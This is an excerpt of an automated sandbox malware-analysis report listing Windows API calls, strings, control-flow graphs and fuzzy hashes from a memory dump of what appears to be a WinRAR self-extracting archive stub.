                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: _wcslen$H_prolog$AttributesFile_swprintf$CurrentProcess__aulldiv_wcsrchr
                    • String ID: __tmp_reference_source_
                    • API String ID: 70197177-685763994
                    • Opcode ID: 38a276e83f9fad901bfb5b7b4884c84d3821792828f4018bee59f0f794043963
                    • Instruction ID: 07447326fe55fab21a6ebd4174e16f1e18667403ee6faa0e36261b1378f48a95
                    • Opcode Fuzzy Hash: 38a276e83f9fad901bfb5b7b4884c84d3821792828f4018bee59f0f794043963
                    • Instruction Fuzzy Hash: 4AA2F971904245AEDF15DF74C895BE9BBF8FF05300F0841F9E949AB282DB38A949CB61
                    APIs
                    • GetCurrentProcess.KERNEL32(?,?,00B89186,?,00B9D570,0000000C,00B892DD,?,00000002,00000000), ref: 00B891D1
                    • TerminateProcess.KERNEL32(00000000,?,00B89186,?,00B9D570,0000000C,00B892DD,?,00000002,00000000), ref: 00B891D8
                    • ExitProcess.KERNEL32 ref: 00B891EA
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: Process$CurrentExitTerminate
                    • String ID:
                    • API String ID: 1703294689-0
                    • Opcode ID: 2992e3a53eb1fc0b57569895ad8e68d884e986b6a9a61bc21a55a2cbbd414cec
                    • Instruction ID: 37090f4dbfcdaf6966b44b43ffc52d6c9730678ff7ab3b7ff5999d13fdb27b64
                    • Opcode Fuzzy Hash: 2992e3a53eb1fc0b57569895ad8e68d884e986b6a9a61bc21a55a2cbbd414cec
                    • Instruction Fuzzy Hash: D0E0B635004148ABCF117F64DE0DE697FAAEB50752F054055F9099B132CB35DD83DB90
                    APIs
                    • __EH_prolog.LIBCMT ref: 00B7C9D5
                      • Part of subcall function 00B612F6: GetDlgItem.USER32(00000000,00003021), ref: 00B6133A
                      • Part of subcall function 00B612F6: SetWindowTextW.USER32(00000000,00B945F4), ref: 00B61350
                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00B7CAC1
                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B7CADF
                    • IsDialogMessageW.USER32(?,?), ref: 00B7CAF2
                    • TranslateMessage.USER32(?), ref: 00B7CB00
                    • DispatchMessageW.USER32(?), ref: 00B7CB0A
                    • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 00B7CB2D
                    • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 00B7CB50
                    • GetDlgItem.USER32(?,00000068), ref: 00B7CB73
                    • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00B7CB8E
                    • SendMessageW.USER32(00000000,000000C2,00000000,00B945F4), ref: 00B7CBA1
                      • Part of subcall function 00B7E598: _wcslen.LIBCMT ref: 00B7E5C2
                    • SetFocus.USER32(00000000), ref: 00B7CBA8
                    • _swprintf.LIBCMT ref: 00B7CC07
                      • Part of subcall function 00B64A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B64A33
                    • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00B7CC6A
                    • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 00B7CC92
                    • GetTickCount.KERNEL32 ref: 00B7CCB0
                    • _swprintf.LIBCMT ref: 00B7CCC8
                    • GetLastError.KERNEL32(?,00000011), ref: 00B7CCFA
                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 00B7CD4D
                    • _swprintf.LIBCMT ref: 00B7CD84
                    • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007402,winrarsfxmappingfile.tmp), ref: 00B7CDD8
                    • GetCommandLineW.KERNEL32 ref: 00B7CDEE
                    • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,00BB1482,00000400,00000001,00000001), ref: 00B7CE45
                    • ShellExecuteExW.SHELL32(0000003C), ref: 00B7CE6D
                    • Sleep.KERNEL32(00000064), ref: 00B7CEB5
                    • UnmapViewOfFile.KERNEL32(?,?,0000421C,00BB1482,00000400), ref: 00B7CEDE
                    • CloseHandle.KERNEL32(00000000), ref: 00B7CEE7
                    • _swprintf.LIBCMT ref: 00B7CF1A
                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00B7CF79
                    • SetDlgItemTextW.USER32(?,00000065,00B945F4), ref: 00B7CF90
                    • GetDlgItem.USER32(?,00000065), ref: 00B7CF99
                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00B7CFA8
                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00B7CFB7
                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00B7D064
                    • _wcslen.LIBCMT ref: 00B7D0BA
                    • _swprintf.LIBCMT ref: 00B7D0E4
                    • SendMessageW.USER32(?,00000080,00000001,?), ref: 00B7D12E
                    • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 00B7D148
                    • GetDlgItem.USER32(?,00000068), ref: 00B7D151
                    • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 00B7D167
                    • GetDlgItem.USER32(?,00000066), ref: 00B7D181
                    • SetWindowTextW.USER32(00000000,00BB389A), ref: 00B7D1A3
                    • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 00B7D203
                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00B7D216
                    • KiUserCallbackDispatcher.NTDLL(?), ref: 00B7D277
                    • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001C7B0,00000000,?), ref: 00B7D2B9
                    • KiUserCallbackDispatcher.NTDLL(00000000,00000000), ref: 00B7D393
                    • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00B7D3D5
                    • PostMessageW.USER32(?,00000111,00000001,00000000), ref: 00B7D3DD
                      • Part of subcall function 00B7D884: __EH_prolog.LIBCMT ref: 00B7D889
                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00B7D3F9
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: Item$Message$Text$Send$_swprintf$FileWindow$CallbackDispatcherErrorLastUser$DialogH_prologLongView_wcslen$CloseCommandCountCreateDispatchExecuteFocusHandleLineMappingModuleNameParamPostShellSleepTickTranslateUnmap__vswprintf_c_l
                    • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                    • API String ID: 3467143283-1645151803
                    • Opcode ID: e7842b421c6f5ce388dc8b2667ef808b18ac10584ece90dbfa8b86d4c2c2f468
                    • Instruction ID: edccf3e5723f6620cabb4061884a1b0f424123709c49bd416252f9661fc35ec5
                    • Opcode Fuzzy Hash: e7842b421c6f5ce388dc8b2667ef808b18ac10584ece90dbfa8b86d4c2c2f468
                    • Instruction Fuzzy Hash: E442E371944204BAEB21AB649C4AFBE3BFCEB05740F0481D9F558B71E2CFB45A45CB62

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 272 b71b83-b71ba6 call b7ffd0 GetModuleHandleW 275 b71c07-b71e68 272->275 276 b71ba8-b71bbf GetProcAddress 272->276 277 b71f34-b71f60 GetModuleFileNameW call b6d6a7 call b7192f 275->277 278 b71e6e-b71e79 call b889ee 275->278 279 b71bc1-b71bd7 276->279 280 b71bd9-b71be9 GetProcAddress 276->280 295 b71f62-b71f6e call b6c619 277->295 278->277 289 b71e7f-b71ead GetModuleFileNameW CreateFileW 278->289 279->280 283 b71c05 280->283 284 b71beb-b71c00 280->284 283->275 284->283 292 b71eaf-b71ebb SetFilePointer 289->292 293 b71f28-b71f2f CloseHandle 289->293 292->293 296 b71ebd-b71ed9 ReadFile 292->296 293->277 301 b71f70-b71f7b call b71b3b 295->301 302 b71f9d-b71fc4 call b6d71d GetFileAttributesW 295->302 296->293 298 b71edb-b71f00 296->298 300 b71f1d-b71f26 call b7169e 298->300 300->293 307 b71f02-b71f1c call b71b3b 300->307 301->302 313 b71f7d-b71f9b CompareStringW 301->313 310 b71fc6-b71fca 302->310 311 b71fce 302->311 307->300 310->295 314 b71fcc 310->314 315 b71fd0-b71fd5 311->315 313->302 313->310 314->315 317 b71fd7 315->317 318 b7200c-b7200e 315->318 319 b71fd9-b72000 call b6d71d GetFileAttributesW 317->319 320 b72014-b7202b call b6d6f1 call b6c619 318->320 321 b7211b-b72125 318->321 326 b72002-b72006 319->326 327 b7200a 319->327 331 b72093-b720c6 call b64a20 AllocConsole 320->331 332 b7202d-b7208e call b71b3b * 2 call b6f937 call b64a20 call b6f937 call b7b7f4 320->332 326->319 330 b72008 326->330 327->318 330->318 337 b72113-b72115 ExitProcess 331->337 338 b720c8-b7210d GetCurrentProcessId AttachConsole call b84fa3 GetStdHandle WriteConsoleW Sleep FreeConsole 331->338 332->337 338->337
                    APIs
                    • GetModuleHandleW.KERNEL32(kernel32), ref: 00B71B9C
                    • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00B71BAE
                    • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00B71BDF
                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00B71E89
                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B71EA3
                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00B71EB3
                    • ReadFile.KERNEL32(00000000,?,00007FFE,00B94D24,00000000), ref: 00B71ED1
                    • CloseHandle.KERNEL32(00000000), ref: 00B71F29
                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00B71F3E
                    • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,00B94D24,?,00000000,?,00000800), ref: 00B71F92
                    • GetFileAttributesW.KERNELBASE(?,?,00B94D24,00000800,?,00000000,?,00000800), ref: 00B71FBC
                    • GetFileAttributesW.KERNEL32(?,?,00B94DEC,00000800), ref: 00B71FF8
                      • Part of subcall function 00B71B3B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00B71B56
                      • Part of subcall function 00B71B3B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00B7063A,Crypt32.dll,00000000,00B706B4,00000200,?,00B70697,00000000,00000000,?), ref: 00B71B78
                    • _swprintf.LIBCMT ref: 00B7206A
                    • _swprintf.LIBCMT ref: 00B720B6
                      • Part of subcall function 00B64A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B64A33
                    • AllocConsole.KERNEL32 ref: 00B720BE
                    • GetCurrentProcessId.KERNEL32 ref: 00B720C8
                    • AttachConsole.KERNEL32(00000000), ref: 00B720CF
                    • _wcslen.LIBCMT ref: 00B720E4
                    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00B720F5
                    • WriteConsoleW.KERNEL32(00000000), ref: 00B720FC
                    • Sleep.KERNEL32(00002710), ref: 00B72107
                    • FreeConsole.KERNEL32 ref: 00B7210D
                    • ExitProcess.KERNEL32 ref: 00B72115
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                    • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                    • API String ID: 1207345701-3298887752
                    • Opcode ID: f5695653f75a4466720bd2cc1a7ac25966e7625d569ff5d4cc7f748ab541d5a7
                    • Instruction ID: c3e70da284118ff6f489ca4dd1a8a3f773f5dfd4fda7591561bd0ad6e0cb2b5c
                    • Opcode Fuzzy Hash: f5695653f75a4466720bd2cc1a7ac25966e7625d569ff5d4cc7f748ab541d5a7
                    • Instruction Fuzzy Hash: D5D182B20487849BDB319F54D949F9F7AE8FF85304F5049ADF2999B150CBB08909CB62

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 351 b7d884-b7d89c call b7fefc call b7ffd0 356 b7e552-b7e55d 351->356 357 b7d8a2-b7d8cc call b7c504 351->357 357->356 360 b7d8d2-b7d8d7 357->360 361 b7d8d8-b7d8e6 360->361 362 b7d8e7-b7d8fc call b7c11c 361->362 365 b7d8fe 362->365 366 b7d900-b7d915 call b73316 365->366 369 b7d917-b7d91b 366->369 370 b7d922-b7d925 366->370 369->366 371 b7d91d 369->371 372 b7e51e-b7e549 call b7c504 370->372 373 b7d92b 370->373 371->372 372->361 384 b7e54f-b7e551 372->384 375 b7dba4-b7dba6 373->375 376 b7db03-b7db05 373->376 377 b7d932-b7d935 373->377 378 b7dbc1-b7dbc3 373->378 375->372 380 b7dbac-b7dbbc SetWindowTextW 375->380 376->372 382 b7db0b-b7db17 376->382 377->372 383 b7d93b-b7d995 call b7b65d call b6d200 call b6b93d call b6ba77 call b679e5 377->383 378->372 381 b7dbc9-b7dbd0 378->381 380->372 381->372 385 b7dbd6-b7dbef 381->385 386 b7db2b-b7db30 382->386 387 b7db19-b7db2a call b88a79 382->387 437 b7dad4-b7dae9 call b6b9ca 383->437 384->356 389 b7dbf7-b7dc05 call b84fa3 385->389 390 b7dbf1 385->390 393 b7db32-b7db38 386->393 394 b7db3a-b7db45 call b7c67e 386->394 387->386 389->372 407 b7dc0b-b7dc14 389->407 390->389 398 b7db4a-b7db4c 393->398 394->398 403 b7db57-b7db77 call b84fa3 call b8521e 398->403 404 b7db4e-b7db55 call b84fa3 398->404 425 b7db90-b7db92 403->425 426 b7db79-b7db80 403->426 404->403 411 b7dc16-b7dc1a 407->411 412 b7dc3d-b7dc40 407->412 414 b7dc46-b7dc49 411->414 417 b7dc1c-b7dc24 411->417 412->414 415 b7dd25-b7dd33 call b7192f 412->415 419 b7dc56-b7dc71 414->419 420 b7dc4b-b7dc50 414->420 435 b7dd35-b7dd49 call b836be 415->435 417->372 423 b7dc2a-b7dc38 call b7192f 417->423 438 b7dc73-b7dcad 419->438 439 b7dcbb-b7dcc2 419->439 420->415 420->419 423->435 425->372 434 b7db98-b7db9f call b85219 425->434 432 b7db87-b7db8f call b88a79 426->432 433 b7db82-b7db84 426->433 432->425 433->432 434->372 450 b7dd56-b7dda7 call b7192f call b7c3ae GetDlgItem SetWindowTextW SendMessageW call b87306 435->450 451 b7dd4b-b7dd4f 435->451 455 b7daef-b7dafe call b6b953 437->455 456 b7d99a-b7d9ae SetFileAttributesW 437->456 474 b7dcb1-b7dcb3 438->474 475 b7dcaf 438->475 444 b7dcc4-b7dcdc call b84fa3 439->444 445 b7dcf0-b7dd13 call b84fa3 * 2 439->445 444->445 461 b7dcde-b7dceb call b71907 444->461 445->435 479 b7dd15-b7dd23 call b71907 445->479 485 b7ddac-b7ddb0 450->485 451->450 457 b7dd51-b7dd53 451->457 455->372 463 b7da54-b7da64 GetFileAttributesW 456->463 464 b7d9b4-b7d9e7 call b6cdc0 call b6caa0 call b84fa3 456->464 457->450 461->445 463->437 472 b7da66-b7da75 DeleteFileW 463->472 494 b7d9fa-b7da08 call b6d1c1 464->494 495 b7d9e9-b7d9f8 call b84fa3 464->495 472->437 478 b7da77-b7da7a 472->478 474->439 475->474 482 b7da7e-b7daaa call b64a20 GetFileAttributesW 478->482 479->435 492 b7da7c-b7da7d 482->492 493 b7daac-b7dac2 MoveFileW 482->493 485->372 489 b7ddb6-b7ddca SendMessageW 485->489 489->372 492->482 493->437 496 b7dac4-b7dace MoveFileExW 493->496 494->455 501 b7da0e-b7da4d call b84fa3 call b811b0 494->501 495->494 495->501 496->437 501->463
                    APIs
                    • __EH_prolog.LIBCMT ref: 00B7D889
                      • Part of subcall function 00B7C504: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00B7C5EB
                    • _wcslen.LIBCMT ref: 00B7DB4F
                    • _wcslen.LIBCMT ref: 00B7DB58
                    • SetWindowTextW.USER32(?,?), ref: 00B7DBB6
                    • _wcslen.LIBCMT ref: 00B7DBF8
                    • _wcsrchr.LIBVCRUNTIME ref: 00B7DD40
                    • GetDlgItem.USER32(?,00000066), ref: 00B7DD7B
                    • SetWindowTextW.USER32(00000000,?), ref: 00B7DD8B
                    • SendMessageW.USER32(00000000,00000143,00000000,00BB389A), ref: 00B7DD99
                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00B7DDC4
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                    • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                    • API String ID: 2804936435-312220925
                    • Opcode ID: dae985b2eddce237b0ff33bc0b91d0a17dabe3d9aa764cb697d9febaf120ab2b
                    • Instruction ID: f488b519b8c1a1d7cca44dbb8a0eaab830fe05cb0ffd25d0d6792f054516f8ab
                    • Opcode Fuzzy Hash: dae985b2eddce237b0ff33bc0b91d0a17dabe3d9aa764cb697d9febaf120ab2b
                    • Instruction Fuzzy Hash: 12E14CB2900119AADB24EBA4DC85EEE77FCEF04350F4484E6F659E3050EF749A84CB60
                    APIs
                    • __EH_prolog.LIBCMT ref: 00B6ED90
                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00B6EDCC
                      • Part of subcall function 00B6D6A7: _wcslen.LIBCMT ref: 00B6D6AF
                      • Part of subcall function 00B71907: _wcslen.LIBCMT ref: 00B7190D
                      • Part of subcall function 00B72ED2: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00B6CF18,00000000,?,?), ref: 00B72EEE
                    • _wcslen.LIBCMT ref: 00B6F109
                    • __fprintf_l.LIBCMT ref: 00B6F23C
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
                    • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                    • API String ID: 566448164-801612888
                    • Opcode ID: 87e0ea4192dbc61891506f6f52dac7788f101d2150f2b48fb13ab349b029c848
                    • Instruction ID: 20f6fd691b13f935ab3c21625974c148aff0a2f85dd8b6731c5312a8c8cab0b9
                    • Opcode Fuzzy Hash: 87e0ea4192dbc61891506f6f52dac7788f101d2150f2b48fb13ab349b029c848
                    • Instruction Fuzzy Hash: 8132F07290021AEBCF24EF68D841AFA37E5FF14704F4041AAFA1697291EB79DD81CB54

                    Control-flow Graph

                    APIs
                      • Part of subcall function 00B7C758: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00B7C769
                      • Part of subcall function 00B7C758: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B7C77A
                      • Part of subcall function 00B7C758: IsDialogMessageW.USER32(000104C2,?), ref: 00B7C78E
                      • Part of subcall function 00B7C758: TranslateMessage.USER32(?), ref: 00B7C79C
                      • Part of subcall function 00B7C758: DispatchMessageW.USER32(?), ref: 00B7C7A6
                    • GetDlgItem.USER32(00000068,00BC1CF0), ref: 00B7E62D
                    • ShowWindow.USER32(00000000,00000005,?,?,00000001,?,?,00B7C9A9,00B960F0,00BC1CF0,00BC1CF0,00001000,00BA30C4,00000000,?), ref: 00B7E655
                    • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00B7E660
                    • SendMessageW.USER32(00000000,000000C2,00000000,00B945F4), ref: 00B7E66E
                    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00B7E684
                    • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00B7E69E
                    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00B7E6E2
                    • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00B7E6F0
                    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00B7E6FF
                    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00B7E726
                    • SendMessageW.USER32(00000000,000000C2,00000000,00B9549C), ref: 00B7E735
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                    • String ID: \
                    • API String ID: 3569833718-2967466578
                    • Opcode ID: 89ac95b511845428d3bc8781526b25b05f6f5947bcbcd71dceb2340295e7eda8
                    • Instruction ID: 4d374252bacd329e72db1ba8eea6ffebed37ab3c26d5e39c995535bfc794a3f2
                    • Opcode Fuzzy Hash: 89ac95b511845428d3bc8781526b25b05f6f5947bcbcd71dceb2340295e7eda8
                    • Instruction Fuzzy Hash: 0431E171145B40AFD321DF209C4EFAB3FACEB4A704F040958F6A1A72A0CB646A0487A6

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 822 b7b6d2-b7b6ef FindResourceW 823 b7b6f5-b7b706 SizeofResource 822->823 824 b7b7eb 822->824 823->824 826 b7b70c-b7b71b LoadResource 823->826 825 b7b7ed-b7b7f1 824->825 826->824 827 b7b721-b7b72c LockResource 826->827 827->824 828 b7b732-b7b747 GlobalAlloc 827->828 829 b7b7e3-b7b7e9 828->829 830 b7b74d-b7b756 GlobalLock 828->830 829->825 831 b7b7dc-b7b7dd GlobalFree 830->831 832 b7b75c-b7b77a call b82dc0 830->832 831->829 836 b7b7d5-b7b7d6 GlobalUnlock 832->836 837 b7b77c-b7b79e call b7b636 832->837 836->831 837->836 842 b7b7a0-b7b7a8 837->842 843 b7b7c3-b7b7d1 842->843 844 b7b7aa-b7b7be GdipCreateHBITMAPFromBitmap 842->844 843->836 844->843 845 b7b7c0 844->845 845->843
                    APIs
                    • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00B7C92D,00000066), ref: 00B7B6E5
                    • SizeofResource.KERNEL32(00000000,?,?,?,00B7C92D,00000066), ref: 00B7B6FC
                    • LoadResource.KERNEL32(00000000,?,?,?,00B7C92D,00000066), ref: 00B7B713
                    • LockResource.KERNEL32(00000000,?,?,?,00B7C92D,00000066), ref: 00B7B722
                    • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00B7C92D,00000066), ref: 00B7B73D
                    • GlobalLock.KERNEL32(00000000,?,?,?,?,?,00B7C92D,00000066), ref: 00B7B74E
                    • GlobalUnlock.KERNEL32(00000000), ref: 00B7B7D6
                      • Part of subcall function 00B7B636: GdipAlloc.GDIPLUS(00000010), ref: 00B7B63C
                    • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00B7B7B7
                    • GlobalFree.KERNEL32(00000000), ref: 00B7B7DD
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: GlobalResource$AllocGdipLock$BitmapCreateFindFreeFromLoadSizeofUnlock
                    • String ID: PNG
                    • API String ID: 541704414-364855578
                    • Opcode ID: 2d3c886514e535562a315ce7ded86581f85cac6993193cd8643d2456eb227119
